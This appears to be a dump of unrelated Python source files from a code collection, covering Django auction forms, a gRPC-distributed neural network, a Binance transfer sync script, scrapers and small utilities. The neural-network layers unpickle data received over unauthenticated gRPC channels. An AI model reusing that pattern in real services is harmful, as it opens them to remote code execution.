        user = super(UserForm, self).save(commit=False)
        user.username = self.cleaned_data["email"]
        user.set_password(self.cleaned_data["password"])
        if commit:
            user.save()
        return user
class ProfileForm(forms.ModelForm):
    """Profile edit form with Bootstrap widget classes applied to every field."""

    class Meta:
        model = Profile
        exclude = ('id',)

    def __init__(self, *args, **kwargs):
        super(ProfileForm, self).__init__(*args, **kwargs)
        for field_name, field in self.fields.items():
            if field:
                field.widget.attrs.update({'class': 'form-control input-lg',
                                           'placeholder': field.label,
                                           'autocomplete': 'off'})
# Inline formset binding exactly one Profile to its User (no delete UI).
UserProfileForm = inlineformset_factory(User, Profile, form=ProfileForm, extra=1, can_delete=False)
class AuctionForm(forms.ModelForm):
    """Create/edit form for Auction; server-managed fields are excluded."""

    class Meta:
        model = Auction
        exclude = ('account', 'slug', 'status', 'winner', 'is_active',)

    def __init__(self, *args, **kwargs):
        super(AuctionForm, self).__init__(*args, **kwargs)
        for field_name in self.fields:
            field = self.fields.get(field_name)
            if not field:
                continue
            field.widget.attrs.update({'class': 'form-control input-lg',
                                       'placeholder': field.label,
                                       'autocomplete': 'off'})
            if field_name == 'expire':
                # the expiry field additionally gets the datepicker hook
                field.widget.attrs.update({'class': 'form-control input-lg datepicker'})

    def clean_expire(self):
        """Require the expiry date to be at least 72 hours from today."""
        expire = self.cleaned_data.get("expire").date()
        earliest = date.today() + timedelta(days=3)
        if expire < earliest:
            raise forms.ValidationError(_("Expire should be 72 hour from now on."))
        return expire
class BidAuction(forms.ModelForm):
    """Bid form bound to a specific auction (passed in via the 'auction' kwarg)."""

    class Meta:
        model = Bid
        exclude = ('id', 'auction', 'bidder',)

    def __init__(self, *args, **kwargs):
        self.auction = kwargs.pop('auction', None)
        super(BidAuction, self).__init__(*args, **kwargs)
        for field_name in self.fields:
            field = self.fields.get(field_name)
            if field:
                field.widget.attrs.update({'class': 'form-control input-lg',
                                           'placeholder': field.label,
                                           'autocomplete': 'off'})

    def clean_bid_price(self):
        """Require the bid to beat the current high bid by at least 0.05.

        Falls back to the auction's asking price when no bid exists yet.
        """
        highest = Bid.objects.filter(auction=self.auction).aggregate(
            Max('bid_price'))['bid_price__max']
        if highest is None:
            highest = self.auction.price.amount
        price = self.cleaned_data.get("bid_price")
        # min_price = highest + (self.auction.price.amount * 5) / 100
        # Bug fix: Decimal(0.05) inherits binary-float rounding error
        # (0.05000000000000000277...); construct from a string instead.
        min_price = highest + Decimal('0.05')
        if price < min_price:
            raise forms.ValidationError(_("Price should be more than %s." % "{0:.2f}".format(min_price)))
        return price
|
6,361 | fa6f251f27b645fc6827285b5578fd9634c8bb30 | import gzip
import pickle as pkl
import time
from datetime import datetime
import grpc
import numpy as np
from sklearn.utils import shuffle
import neural_nets_pb2 as nn_pb
import neural_nets_pb2_grpc as nn_pb_grpc
from mnist_loader import load_data
from activations import *
# pylint: disable=too-many-arguments
class Layer(nn_pb_grpc.LayerDataExchangeServicer):
    """Abstract base for one neural-network layer running as a gRPC service.

    Holds the plumbing shared by input/hidden/output layers: stubs to the
    neighbouring layers, weight storage and updates, and (de)serialization
    of the forward/backward protobuf messages.
    """

    # pylint: disable=too-many-arguments
    def __init__(self, layer_name, upper_layer, lower_layer,
                 lower_layer_nodes, current_layer_nodes,
                 nonlin, nonlin_prime):
        """
        upper_layer / lower_layer: gRPC addresses of the neighbouring layers
        nonlin: activation function
        nonlin_prime: the derivative of activation function
        """
        self.layer_name = layer_name
        self.upper_layer_addr = upper_layer
        self.lower_layer_addr = lower_layer
        self.nonlin = nonlin
        self.nonlin_prime = nonlin_prime

        # lazy initialization: stubs are created on first use
        self.upper_layer_stub = None
        self.lower_layer_stub = None

        # weights dimension: (this layer's nodes, lower layer's nodes)
        self.weights_shape = (current_layer_nodes, lower_layer_nodes)
        self.weights = None
        self.biases = None

        # record outputs from lower layer, keyed by batch id.
        # Purposes:
        # 1) used for computing the weighted sum of current layer
        # 2) used for computing the gradients for updating weights of current layer
        self.lower_layer_outputs = {}

        # cache of weighted sums per batch, needed later to compute
        # delta = partial_delta_rec * nonlin_prime(weighted_sum)
        self.weighted_sum_inputs = {}

    def forward_to_upper(self, batch_id, forward_matrix, forward_labels, istrain):
        """Send this layer's outputs (and labels) to the upper layer via RPC."""
        if not self.upper_layer_stub:
            self.create_upper_stub()

        # convert numpy array to byte string (pickle protocol 2)
        bytes_matrix = pkl.dumps(forward_matrix, 2)
        bytes_labels = pkl.dumps(forward_labels, 2)

        # send message to next layer
        res = self.upper_layer_stub.UpdateInput(
            nn_pb.ForwardMsg(batch_id=batch_id,
                             output_matrix=bytes_matrix,
                             labels=bytes_labels,
                             is_train=istrain))
        # print("get response form upper layer", res.message)

    def backward_to_lower(self, batch_id, partial_delta, labels):
        """Back-propagate the error term to the lower layer.

        partial_delta = dot(self.weights.T, self.delta)
        self.delta = delta_received_from_upper * nonlin_prime(z)
        """
        # create stub for lower layer on demand
        if not self.lower_layer_stub:
            self.create_lower_stub()

        # convert partial_delta matrix to a bytes string
        bytes_delta = pkl.dumps(partial_delta)
        bytes_labels = pkl.dumps(labels)

        res = self.lower_layer_stub.UpdateDelta(
            nn_pb.BackwardMsg(batch_id=batch_id,
                              partial_delta=bytes_delta,
                              labels=bytes_labels))
        # print("get response from lower layer", res.message)

    def create_upper_stub(self):
        """Create the gRPC stub for exchanging data with the upper layer."""
        if self.upper_layer_addr:
            channel = grpc.insecure_channel(self.upper_layer_addr)
            self.upper_layer_stub = nn_pb_grpc.LayerDataExchangeStub(channel)
        else:
            print("no upper layer has been specified")

    def create_lower_stub(self):
        """Create the gRPC stub for lower-layer communication."""
        if self.lower_layer_addr:
            channel = grpc.insecure_channel(self.lower_layer_addr)
            self.lower_layer_stub = nn_pb_grpc.LayerDataExchangeStub(channel)
        else:
            print("no lower layer has been specified")

    def init_weights(self, load_weights=None):
        """Initialize weights randomly, or load trained weights if specified."""
        if load_weights:
            # TODO
            pass
        else:
            # x: lower layer node count (fan-in)
            # y: current layer node count
            x = self.weights_shape[1]
            y = self.weights_shape[0]
            # scaled Gaussian init (1/sqrt(fan_in)) keeps early activations bounded
            self.weights = np.random.randn(y, x) / np.sqrt(x)  # pylint: disable=no-member
            self.biases = np.random.randn(y, 1)  # pylint: disable=no-member

    def check_weights(self):
        # hard abort: every forward/backward pass requires initialized weights
        if self.weights is None or self.biases is None:
            print("Weights of {} have not initialized".format(self.layer_name))
            import sys
            sys.exit(-1)

    def update_weights(self, lr, delta, outputs_of_lower):
        """SGD step: update biases and weights from the batch-averaged gradients.

        outputs_of_lower: equals the inputs of this layer.
        """
        delta_shape = delta.shape
        inputs_shape = outputs_of_lower.shape

        # update biases with the batch-mean delta
        avg_delta = np.mean(delta, axis=0).reshape(delta_shape[1], 1)
        self.biases = self.biases - lr * avg_delta

        # compute gradients for weights via broadcasting: outer product per sample
        delta = delta.reshape(delta_shape[0], delta_shape[1], 1)
        inputs = outputs_of_lower.reshape(inputs_shape[0], 1, inputs_shape[1])
        gradients = delta * inputs
        gradients_avg = np.mean(gradients, axis=0)
        self.weights = self.weights - lr * gradients_avg

    def parse_forward_msg(self, req):
        """Extract and unpickle the fields of a ForwardMsg."""
        batch_id = req.batch_id
        bytes_outputs_of_lower = req.output_matrix
        bytes_labels = req.labels
        is_train = req.is_train

        outputs_of_lower = pkl.loads(bytes_outputs_of_lower)
        labels = pkl.loads(bytes_labels)
        return batch_id, outputs_of_lower, labels, is_train

    # rpc service hooks; overridden in subclasses
    def UpdateInput(self, request, context):
        # implemented in HiddenLayer and OutputLayer
        pass

    def UpdateDelta(self, request, context):
        """Invoked by the upper layer; implemented by HiddenLayer."""
        pass
class InputLayer(Layer):
    """Entry layer: feeds minibatches of the MNIST dataset into the network."""

    def __init__(self, upper_layer, data_path, input_dim, layer_name="input"):
        super().__init__(layer_name, upper_layer,
                         None, None, input_dim,
                         None, None)
        # (train, validation, test) splits, each an (X, y) pair
        self.train, self.val, self.test = load_data(data_path)

    def start_feed_data(self, batch_size, epochs):
        """Shuffle and stream training minibatches upward; after each epoch
        send the validation set (negative batch ids mark evaluation data)."""
        train_X = self.train[0]
        train_y = self.train[1]
        val_X = self.val[0]
        val_y = self.val[1]
        train_size = train_X.shape[0]
        batch_id = 0
        test_batch_id = -1  # use negative numbers, distinct from batch_id
        for i in range(epochs):
            print("Start feed {0} epoch data".format(i))
            train_X, train_y = shuffle(train_X, train_y)
            for j in range(0, train_size, batch_size):
                minibatch_X = train_X[j:j+batch_size]
                minibatch_y = train_y[j:j+batch_size]
                self.forward_to_upper(batch_id, minibatch_X, minibatch_y, True)
                batch_id += 1

            # send validation data for evaluation at the end of the epoch
            self.forward_to_upper(test_batch_id, val_X, val_y, False)
            test_batch_id -= 1

    def UpdateInput(self, req, ctx):
        """Invalid here: the input layer has no lower layer."""
        print("Should not have lower layer")
        return nn_pb.PlainResponse(message="Wrong invoke!")

    def UpdateDelta(self, req, ctx):
        """Terminal point of backpropagation; just log progress periodically."""
        batch_id = req.batch_id
        if batch_id % 100 == 0:
            print("Complete backpropagation for batch {} at {}".format(
                batch_id,
                datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
        return nn_pb.PlainResponse(message="Received at layer {}".format(
            self.layer_name))
class HiddenLayer(Layer):
    """Hidden layer: forward activation, backprop, optional synthetic gradients."""

    def __init__(self, layer_name,
                 upper_layer,
                 lower_layer,
                 lower_layer_size,
                 layer_size,
                 nonlin,
                 nonlin_prime,
                 learning_rate,
                 enable_synthetic_gradients,
                 sg_learning_rate
                 ):
        """
        enable_synthetic_gradients: whether to use synthetic gradients
          for error approximation
        sg_learning_rate: learning rate for the synthetic-gradient model
        """
        super().__init__(layer_name, upper_layer,
                         lower_layer, lower_layer_size,
                         layer_size, nonlin,
                         nonlin_prime)
        self.lr = learning_rate
        self.enable_sg = enable_synthetic_gradients
        self.sg_lr = sg_learning_rate
        self.sg_weights = None   # lazily created [A, B, C] linear SG model
        self.sg_deltas = {}      # batch_id -> SG-estimated delta awaiting the true one

    def init_sg_weights(self):
        """Initialize the linear synthetic-gradient model
        SG(h, y) = hA + yB + C
        (refer to the paper "Understanding synthetic gradients and decoupled
        neural interfaces").
        """
        n = self.weights_shape[0]  # size of current layer
        # pylint: disable=no-member
        A = np.random.randn(n, n) / np.sqrt(n)
        B = np.random.randn(10, n) / np.sqrt(n)
        C = np.random.randn(1, n) / np.sqrt(n)
        # pylint: enable=no-member
        self.sg_weights = [A, B, C]

    def check_sg_weights(self):
        # lazy initialization of the SG model
        if self.sg_weights is None:
            self.init_sg_weights()

    def SG(self, h, y):
        """Estimate a delta from activations and labels.

        h: outputs of this layer
        y: labels for this batch
        """
        self.check_sg_weights()
        A = self.sg_weights[0]  # (n, n)
        B = self.sg_weights[1]  # (10, n)
        C = self.sg_weights[2]  # (1, n)
        delta = np.matmul(h, A) + np.matmul(y, B) + C
        return delta

    def update_sg_weights(self, true_delta, batch_id):
        """Train the SG model once the true delta arrives.

        Name conventions follow the paper "Understanding synthetic gradients
        and decoupled neural interfaces".
        TODO: synthetic gradient estimates the partial delta instead of the
        true gradients.
        """
        sg_delta = self.sg_deltas[batch_id]
        weighted_sum = self.weighted_sum_inputs[batch_id]
        labels = self.lower_layer_outputs[batch_id]['labels']
        y = labels
        h = self.nonlin(weighted_sum)
        # gradient step on the squared SG error (sg_delta - true_delta)^2
        Err = sg_delta - true_delta
        A = self.sg_weights[0] - self.sg_lr * 2 * np.dot(h.transpose(), Err) / h.shape[0]
        B = self.sg_weights[1] - self.sg_lr * 2 * np.dot(y.transpose(), Err) / y.shape[0]
        C = self.sg_weights[2] - self.sg_lr * 2 * np.mean(Err, axis=0)
        self.sg_weights = [A, B, C]
        # delete the stored SG delta for this batch
        del self.sg_deltas[batch_id]

    def UpdateInput(self, request, context):
        """Invoked by the lower layer.

        Once inputs arrive: compute the weighted sum, then activations,
        then forward the outputs to the next layer.
        request: ForwardMsg
        """
        self.check_weights()
        # get values from message
        batch_id, outputs_of_lower, labels, is_train = self.parse_forward_msg(request)
        print("Get inputs id: {0}, matrix shape: {1}, labels shape: {2}".format(
            batch_id, outputs_of_lower.shape, labels.shape))

        weighted_sum = np.dot(outputs_of_lower, self.weights.transpose()) \
            + self.biases.transpose()
        # save inputs during training; they are needed for the weight update
        if is_train:
            inputs = {'matrix': outputs_of_lower,
                      'labels': labels}
            self.lower_layer_outputs[batch_id] = inputs
            self.weighted_sum_inputs[batch_id] = weighted_sum

        activations = self.nonlin(weighted_sum)  # apply element wise

        # update weights immediately with the SG estimate, if SG is enabled
        if self.enable_sg and is_train:
            print("update weights based on SG delta")
            sg_delta = self.SG(activations, labels)
            # TODO use sg_delta to compute the gradients by sg_delta * self.nonline_prime(z)
            self.update_weights(self.lr, sg_delta, outputs_of_lower)
            self.sg_deltas[batch_id] = sg_delta

        # forward this layer's outputs
        self.forward_to_upper(batch_id, activations, labels, is_train)
        print("batch id: {0}, activations shape {1}".format(
            batch_id, activations.shape))
        # acknowledge receipt
        return nn_pb.PlainResponse(message="Inputs received by layer {}".format(
            self.layer_name))

    def UpdateDelta(self, req, ctx):
        """Invoked by the upper layer with its partial delta.

        delta shape: (batch_size, size_of_current_layer)
        req: BackwardMsg
        """
        batch_id = req.batch_id
        bytes_partial_delta = req.partial_delta
        partial_delta = pkl.loads(bytes_partial_delta)
        bytes_labels = req.labels  # variable currently not useful
        labels = pkl.loads(bytes_labels)

        # compute delta for the current layer
        z = self.weighted_sum_inputs[batch_id]
        z_nonlin_prime = self.nonlin_prime(z)
        # shape of delta: (batch_size, size_of_layer)
        delta = partial_delta * z_nonlin_prime

        # compute the partial delta for the lower layer
        partial_delta_for_lower = np.dot(delta, self.weights)
        # send the partial delta to the lower layer before updating weights
        self.backward_to_lower(batch_id,
                               partial_delta_for_lower,
                               labels)

        if self.enable_sg:
            # train the SG model against the true delta
            # TODO pass partial delta instead
            self.update_sg_weights(delta, batch_id)
        else:
            # update weights regularly
            inputs = self.lower_layer_outputs[batch_id]['matrix']
            self.update_weights(self.lr, delta, inputs)

        # free the cached weighted sum for this batch
        del self.weighted_sum_inputs[batch_id]
        # free the cached lower-layer outputs for this batch
        del self.lower_layer_outputs[batch_id]

        return nn_pb.PlainResponse(
            message="Partial delta received at {}".format(self.layer_name))
class OutputLayer(Layer):
    """Output layer.

    Computes the error from labels and predictions, using softmax output
    activations and the cross-entropy loss.
    """

    def __init__(self, layer_name, lower_layer, lower_layer_size,
                 num_classes, learning_rate):
        super().__init__(layer_name, None,
                         lower_layer,
                         lower_layer_size,
                         num_classes,
                         None,
                         None)
        self.lr = learning_rate

    def UpdateInput(self, req, ctx):
        """On input from the lower layer:
        compute weighted sum -> softmax output -> loss -> back propagate.
        """
        self.check_weights()
        batch_id, outputs_of_lower, labels, is_train = self.parse_forward_msg(req)

        weighted_sum = np.dot(outputs_of_lower, self.weights.transpose()) \
            + self.biases.transpose()
        softmax_output = softmax(weighted_sum, axis=1)
        # print("weighted sum", weighted_sum)
        # print("outputs of lower", outputs_of_lower)

        if is_train:
            # softmax + cross entropy: delta simplifies to (prediction - labels)
            delta = softmax_output - labels
            # compute the lower layer's delta first,
            # because the current error is based on the current weights
            partial_delta_for_lower = np.dot(delta, self.weights)
            # send to lower layer
            self.backward_to_lower(batch_id, partial_delta_for_lower, labels)

            # periodically report the cross-entropy loss
            if batch_id % 100 == 0:
                total_loss = np.log(softmax_output) * labels  # pylint: disable=no-member
                # print("total loss: ", np.sum(total_loss))
                loss = -1 * np.sum(total_loss) / labels.shape[0]
                print("For batch id {}, avg loss: {}".format(batch_id, loss))

            # update weights
            self.update_weights(self.lr, delta, outputs_of_lower)
        else:
            # evaluation pass: count correct argmax predictions
            pred_results = np.argmax(softmax_output, axis=1)
            matched = sum(int(y == t) for (y, t) in zip(pred_results, labels))
            print("Epoch {}, Performance test {} / {}".format(
                -1*batch_id, matched, labels.shape[0]))

        return nn_pb.PlainResponse(message="Inputs received at {}".format(
            self.layer_name))

    def UpdateDelta(self, req, ctx):
        """Invalid here: the output layer has no upper layer."""
        print("Error: No upper layer for output layer")
        return nn_pb.PlainResponse(message="Invalid Operation!!")
|
6,362 | ddbcc8e768f93a0b4f8776b19e752c57feb5bbf9 | #!/usr/bin/env python
#coding=utf-8
from datetime import *
import unittest
def getSnapshot(historyData, id):
    """Replay an animal-position history and return the snapshot whose id
    matches *id*, or an error string for conflicting/invalid input.

    historyData format: repeated records of
        <id line> / <date line> / <animal data lines...> / <blank line>
    NOTE(review): uses dict.iteritems() -- Python 2 only.
    """
    data = historyData.split('\n')
    lines = len(data)
    if lines < 2 :
        return 'Input is too short!'
    index = 0            # 0: expecting an id line, 1: expecting a date line
    curid = ''
    idlist = dict()      # snapshot ids seen so far (duplicates are conflicts)
    recordtime = ''
    animal_pos = dict()  # animal name -> [x, y] stored as strings
    for i in range(lines):
        if len(data[i]) > 0:  # non-empty: id / date / data line
            if index == 0:  # id line (NOTE: an empty id is not handled)
                curid = data[i]
                index += 1
                if curid in idlist:  # duplicate snapshot id -> conflict
                    return 'Conflict found at ' + curid
                else:
                    idlist[curid] = 1  # remember the new id
            elif index == 1:  # date line
                if len(data[i]) == 0:  # empty-date check (unreachable in this branch)
                    return 'Conflict found at ' + curid
                recordtime = data[i]
                index += 1
                try:  # validate the date format
                    t1 = datetime.strptime(recordtime, '%Y/%m/%d %H:%M:%S')
                except:
                    return 'Invalid format.'
            else:  # data line
                animal = data[i].split(' ')
                if len(animal) == 3:  # new animal: must not have been seen before
                    if animal[0] in animal_pos:
                        return 'Conflict found at ' + curid
                    else:
                        animal_pos[animal[0]] = [animal[1], animal[2]]
                elif len(animal) == 5:  # known animal: must have been seen before
                    if animal[0] not in animal_pos:
                        return 'Conflict found at ' + curid
                    else:  # verify the reported position, then apply the delta
                        ox = animal_pos[animal[0]][0]
                        oy = animal_pos[animal[0]][1]
                        if (ox != animal[1]) or (oy != animal[2]):  # position mismatch
                            return 'Conflict found at ' + curid
                        else:  # position confirmed: add the movement delta
                            animal_pos[animal[0]][0] = str(int(animal_pos[animal[0]][0]) + int(animal[3]))
                            animal_pos[animal[0]][1] = str(int(animal_pos[animal[0]][1]) + int(animal[4]))
        else:  # blank line: one snapshot record is complete
            index = 0
        if(id == curid) and (index == 0 or i == lines-1):  # requested id is the current snapshot
            res = ''
            for k, v in animal_pos.iteritems():  # build the result string (Python 2 iteritems)
                tmp = k + ' ' + v[0] + ' ' + v[1]
                res += (tmp + '\n')
            return res
|
6,363 | 1d29ce58ca626155d626216fbbd70d7b241efa25 | import ccxt
import json
import time
from baglanti import mysql_baglan
import datetime
import requests
from urllib.parse import urljoin
import sys
# Open the MySQL connection and force UTF-8 on the session.
db = mysql_baglan("bingo")
cursor = db.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')

# All active users, newest first.
sql = "SELECT apikey,secret,id FROM `users` WHERE status = '1' order by id desc"
cursor.execute(sql)
results = cursor.fetchall()
column_names = ['apikey', 'secret', 'id']

for row in results:
    user = dict(zip(column_names, row))
    print(user['id'])
    # Per-user authenticated Binance client.
    exchange = ccxt.binance({
        'apiKey': user['apikey'],
        'secret': user['secret'],
        'enableRateLimit': True
    })
    #BTC
    if exchange.has['fetchDeposits']:
        # --- withdrawals ---
        withdrawals = exchange.fetch_withdrawals()
        set_data = []
        for withdraw in withdrawals:
            # exchange timestamps are milliseconds since epoch
            date_time = int(withdraw['timestamp'])/1000
            date_time = datetime.datetime.fromtimestamp(date_time)
            set_data.append([user['id'], withdraw['currency'], withdraw['txid'], withdraw['address'], withdraw['type'], withdraw['amount'], withdraw['status'], withdraw['fee']['cost'], date_time])
        # ON DUPLICATE KEY ... user_id=(user_id) leaves existing rows untouched (no-op update).
        sqlguncelleme = "INSERT INTO transfers (user_id, currency, txid, address, type, amount, status, fee, datetime) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s) ON DUPLICATE KEY UPDATE user_id=(user_id)"
        cursor.executemany(sqlguncelleme, set_data,)
        db.commit()

        # --- deposits (fee unknown here, stored as '0') ---
        withdrawals = exchange.fetch_deposits()
        set_data = []
        for withdraw in withdrawals:
            date_time = int(withdraw['timestamp'])/1000
            date_time = datetime.datetime.fromtimestamp(date_time)
            set_data.append([user['id'], withdraw['currency'], withdraw['txid'], withdraw['address'], withdraw['type'], withdraw['amount'], withdraw['status'], '0', date_time])
        sqlguncelleme = "INSERT INTO transfers (user_id, currency, txid, address, type, amount, status, fee, datetime) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s) ON DUPLICATE KEY UPDATE user_id=(user_id)"
        cursor.executemany(sqlguncelleme, set_data,)
        db.commit()
|
6,364 | fab1d2270ae906ca92cf3be2c2d9767737ea6083 | #!/usr/bin/env python
#coding:utf-8
import sys
import time
reload(sys)
sys.setdefaultencoding('utf8')
from bs4 import BeautifulSoup
import requests
import csv
import codecs
import xlwt
#from word_power_dict import get_url_dict
#from Vocabulary_Toefl_MP3s_5000_Words_Memory_Course_dict import get_url_dict
#from new_parade_1_dict import get_url_dict
#from new_parade_1_dict import name as xlsname
#from new_parade_2.new_parade_2_dict import get_url_dict
#from new_parade_2.new_parade_2_dict import name as xlsname
#from new_parade_3.new_parade_3_dict import get_url_dict
#from new_parade_3.new_parade_3_dict import name as xlsname
from new_parade_4.new_parade_4_dict import get_url_dict
from new_parade_4.new_parade_4_dict import name as xlsname
def check_link(url):
    """Fetch *url* and return its decoded body text.

    On any failure, print the error and fall through (returns None).
    NOTE(review): Python 2 print statements below.
    """
    try:
        r = requests.get(url)
        r.raise_for_status()
        # guess the encoding from the body rather than trusting the headers
        r.encoding = r.apparent_encoding
        return r.text
    except Exception as e:
        print '----------'
        print e
        print '----------'
def is_alphabet(uchar):
    """Return True iff *uchar* is an ASCII letter (A-Z or a-z).

    Idiom fix: return the boolean expression directly instead of the
    explicit if/else returning True/False.
    """
    return (u'\u0041' <= uchar <= u'\u005a') or (u'\u0061' <= uchar <= u'\u007a')
def save_contents(result):
    '''result: all the useful result from urls'''
    # utf_8_sig writes a BOM so Excel opens the CSV with the right encoding
    with codecs.open('merriam.csv', 'w', 'utf_8_sig') as f:
        writer = csv.writer(f)
        for i in range(len(result)):
            try:
                # keep only rows whose word cell starts with an ASCII letter
                if is_alphabet(result[i][1][0]):
                    writer.writerow([result[i][1], result[i][3]])
                    print("write in line:", i)
            except:
                # NOTE(review): bare except hides IndexError/TypeError alike
                print("error in line:{}, contents is:{}".format(i, result[i]))
# Shared xlwt workbook and the two output column indices used by write_sheet.
workbook = xlwt.Workbook(encoding='utf-8')
ENGLISH_WORD, CHINESE_TRANSLATE = (0, 1)
def write_sheet(unit_info, result):
    """Add a sheet named *unit_info* to the module-level workbook and fill it
    with (english word, chinese translation) rows taken from *result*."""
    sheet = workbook.add_sheet(unit_info, cell_overwrite_ok=True)
    begin_row = 0
    for i in range(len(result)):
        try:
            # keep only rows whose word cell starts with an ASCII letter
            if is_alphabet(result[i][1][0]):
                sheet.write(begin_row, ENGLISH_WORD, label=result[i][1])
                sheet.write(begin_row, CHINESE_TRANSLATE, label=result[i][3])
                print("write in line:", i)
                begin_row += 1
        except:
            # NOTE(review): bare except hides IndexError/TypeError alike
            print("error in line:{}, contents is:{}".format(i, result[i]))
def save_xls(name):
    """Write the accumulated module-level workbook to the file *name*."""
    workbook.save(name)
def get_contents(urls):
    """Download each url and collect the text of every table cell, row-wise.

    Returns a list of rows; each row is a list of cell strings (entries
    may be None when a cell has mixed content).
    """
    result = []
    for one_url in urls:
        content = check_link(one_url)
        soup = BeautifulSoup(content, 'lxml')
        trs = soup.find_all('tr')
        for tr in trs:
            ui = []
            for td in tr:
                ui.append(td.string)
            result.append(ui)
        time.sleep(1)  # throttle: be polite to the server between pages
    return result
'''
def get_urls(url_content, root_url="https://www.shanbay.com"):
ulist = []
soup = BeautifulSoup(url_content, 'lxml')
urls = soup.find_all('a')
for url in urls:
try:
if url.string.startswith('【无老师7天TOEFL】List'):
ulist.append(root_url + url.get('href'))
for j in range(2, 11):
extend_url = root_url + url.get('href') + '?page=' + str(j)
ulist.append(extend_url)
except:
pass
return ulist
'''
def main():
    """Scrape each word-list unit and save everything into one .xls file."""
    # leftover from development; not used below
    test_url = 'https://www.shanbay.com/wordlist/107125/213385/?page=1'
    url_dict = get_url_dict()
    for unit_info, url_list in url_dict.items():
        result = get_contents(url_list)
        write_sheet(unit_info, result)
    save_xls(xlsname+'.xls')

# NOTE(review): runs at import time -- there is no __main__ guard.
main()
|
6,365 | 76905171602cbeb53903a4b0259685288da3a083 | import os
import datetime
import traceback
import json
import requests
import logging
from model import Product
from naver_api import naver_client_id, naver_client_secret
DEBUG = False

if not DEBUG:
    # silence the noisy AWS SDK loggers outside of debugging
    logging.getLogger('boto3').setLevel(logging.WARNING)
    logging.getLogger('botocore').setLevel(logging.WARNING)

# root logger used by the Lambda runtime
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def lambda_handler(event, context):
    """AWS Lambda entry point: refresh the lowest price of every product
    flagged with do_crawl=True, then report how many were crawled."""
    crawl_targets = list(Product.scan(Product.do_crawl == True))
    for target in crawl_targets:
        target.search_lowest_price()
    print('{} product(s) crawled'.format(len(crawl_targets)))
|
6,366 | 70cef88f3fe93d370e5d21a2b00b761ce530a099 | """
Given a random set of numbers, Print them in sorted order.
Example 1:
Input:
N = 4
arr[] = {1, 5, 3, 2}
Output: {1, 2, 3, 5}
Explanation: After sorting array will
be like {1, 2, 3, 5}.
"""
# complexity --> O(n^2) worst/average case (insertion sort), O(n) when the
# input is already sorted.  (The original comment claimed n*log n, which is
# wrong for insertion sort.)
def sortarray(arr):
    """Sort *arr* in place with insertion sort and return it.

    Empty and single-element lists are handled naturally (the loop body
    never runs).
    """
    for i in range(1, len(arr)):
        key = arr[i]
        j = i - 1
        # shift larger elements one slot right until key's position is free
        while j >= 0 and arr[j] > key:
            arr[j + 1] = arr[j]
            j -= 1
        arr[j + 1] = key
    return arr
# Demo: prints the sorted list [1, 2, 3, 5].
print(sortarray([1,5,2,3]))
6,367 | 1e4d18909b72ceef729efdd7b2ab996ace45f1bd | __author__ = 'matthias'
from tcp import *
from data import *
#SERVER = "131.225.237.31"
#PORT = 33487
# Receive 100 laser-data messages through the project's TCP server wrapper.
data = LaserData()
#server = TCP(SERVER, PORT)
server = TCP()  # default host/port from the tcp module; explicit variant above
server.start_server()
for i in range(100):
    # each call replaces `data` with the next received record
    data = server.recv_server()
    print data  # Python 2 print statement
|
6,368 | 3a053c2c8a2b9123974183e65914dc0f73d2e078 | import glob
import os
import xml.etree.ElementTree as ET
# Rewrite Pascal-VOC style annotation XMLs so their <path> points at the
# dataset's new Google Drive location, and save each under the frame's name.
file_dirs = ["train/", "test/"]

for file_dir in file_dirs:
    fdir = "custom_dataset/" + file_dir
    for directory in os.listdir(fdir):
        # absolute path the annotations should reference after the move
        new_location = "/content/gdrive/My Drive/project/custom_dataset/" + file_dir + directory
        xml_files = glob.glob(fdir + directory + "/*.xml")
        print((fdir + directory + "/" + "*.xml"))
        print(len(xml_files))
        for xml_file in xml_files:
            tree = ET.parse(xml_file)
            root = tree.getroot()
            # root[1] is assumed to be <filename>, root[2] <path>
            # (Pascal-VOC layout -- TODO confirm).  The original also bound
            # root.find('filename') to an unused variable; removed.
            name = root[1].text
            if name[0] == '\\':
                # strip a stray leading backslash produced on Windows
                name = name[1:]
            root[1].text = name
            frame_name = root[2].text[root[2].text.rfind('/') + 1:]
            root[2].text = (new_location + "/" + frame_name)
            # write the updated annotation, named after the frame (minus extension)
            tree.write(fdir + directory + "/" + frame_name[:-4] + '.xml')
6,369 | 8220a6d33cda5861e74d6236757abbc81685a998 | # -*- coding: utf-8 -*-
"""
Modul do zapisu piosenki (wczytywanie ustawien (defs.txt), tworzenie .wav,
"zglasnianie utworu")
"""
print("Laduje modul o nazwie: "+__name__)
import numpy as np
def wczytywanie_ustawien(plik_konfiguracyjny = "defs.txt"):
    """
    Load the settings file (defs.txt) into a dict.

    Args:
        str: plik_konfiguracyjny - name of the configuration file holding
            the parameter values (tempo etc.)
    Returns:
        dict: parametry - names and values of the parameters in use
    """
    import re
    import numpy as np
    # Read the file contents (without the first and last line); each row of
    # the resulting matrix holds one parameter name and its value as
    # separate string elements.
    ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype = str, \
                               skip_header=1, skip_footer=1, delimiter=":")
    # dict that will hold the values
    parametry = {}
    # strip the surrounding "" from each key
    # with a single parameter (one line in the file) `ustawienia` has
    # shape (2,), so it is indexed directly
    if ustawienia.shape == (2,):
        parametry[re.sub('"','',ustawienia[0])] = ustawienia[1]
    # with more parameters, iterate over the matrix rows
    else:
        for l in ustawienia:
            parametry[re.sub('"','',l[0])] = l[1]
    # convert the strings to proper values -- the parameter set is known,
    # so this is done by hand per key
    try:
        parametry['tryb'] = parametry['tryb'].strip() # mode
    # if the parameter is missing, continue without raising
    except KeyError:
        print("Podaj tryb odczytu!")
    try:
        parametry['bpm'] = int(parametry['bpm']) # tempo
    # if the parameter is missing, continue without raising
    except KeyError:
        pass
    try:
        parametry['freq'] = int(parametry['freq']) # output wav sample rate
    # if the parameter is missing, continue without raising
    except KeyError:
        pass
    try:
        parametry['loud'] = float(parametry['loud'] ) # loudness
    # if the parameter is missing, continue without raising
    except KeyError:
        pass
    try:
        # list of weights for the samples
        parametry['wages'] = [float(s) for s in parametry['wages'].split(",")]
    # if the parameter is missing, continue without raising
    except KeyError:
        pass
    return parametry
#b = wczytywanie_ustawien("defs.txt")
#zglasnianie utworu
def zmiana_glosnosci(utwor, procent = 0):
    """Scale the amplitude of *utwor* (int16 samples).

    procent in [-1, 1]: 0 leaves the track unchanged, negative values
